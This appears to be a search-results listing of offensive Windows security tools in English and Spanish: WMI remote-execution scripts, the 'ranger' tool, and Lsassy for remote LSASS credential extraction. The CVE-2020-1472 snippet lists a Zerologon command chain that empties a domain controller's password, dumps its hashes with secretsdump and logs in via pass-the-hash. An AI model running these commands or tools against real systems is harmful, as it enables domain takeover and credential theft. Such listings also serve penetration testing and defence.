7 matches found
WMIExec
WMIexec Conjunto de scripts de Python que realizan diferentes formas de ejecución de comandos a través del protocolo WMI. Artículo del blog https://whiteknightlabs.com/2023/06/26/navigating-stealthy-wmi-lateral-movement/ Uso wmiexecscheduledjob.py Es un script de Python que se autentica en una...
ranger
ranger A tool to support security professionals access and interact with remote Microsoft Windows based systems. This project was conceptualized with the thought process, we did not invent the bow or the arrow, just a more efficient way of using it. Ranger is a command-line driven attack and...
CVE-2020-1472
CVE-2020-1472 arp-scan Rangip nmap -A -vv -Pn IPADDR python3 setemptypw.py DCNETBIOSNAME DCIPADDR python3 secretsdump.py -no-pass -just-dc DOMAIN/DCNETBIOSNAME$@DCIPADDR python3 wmiexec.py -hashes HassPasswdUser DOMAIN/User@dcipaddr windows command whoami systeminfo hostname md testdir echo test...
wmiexec-Pro
wmiexec-Pro New generation of wmiexec.py. Table of Contents 1. Info 2. Special thanks 3. Features 4. Getting Started Installation 5. Usage 6. Screenshots 7. How it works? 8. Disclaimer 9. References Info The new generation of wmiexec.py, more new features, whole the operations only work with port...
wmiexec-RegOut
⛔ OBSOLETO Activo en https://github.com/XiaoliChan/wmiexec-Pro wmiexec-RegOut Versión modificada de impacket wmiexec.py, wmipersist.py. Obtiene la salida datos, respuesta del registro, no necesita conexión SMB, pero estoy en el mal código : Tabla de contenido Resumen Requisitos Uso Trucos...
WMIExec - Set Of Python Scripts Which Perform Different Ways Of Command Execution Via WMI Protocol
Set of python scripts which perform different ways of command execution via WMI protocol. Blog Post https://whiteknightlabs.com/2023/06/26/navigating-stealthy-wmi-lateral-movement/ Usage wmiexecscheduledjob.py Is a python script which authenticates to a remote WMI instance and execute commands vi...
Lsassy - Extract Credentials From Lsass Remotely
Python library to remotely extract credentials. This blog post explains how it works. You can check the wiki This library uses impacket project to remotely read necessary bytes in lsass dump and pypykatz to extract credentials. Requirements Python = 3.6 pypykatz = 0.3.0 impacket Installation From...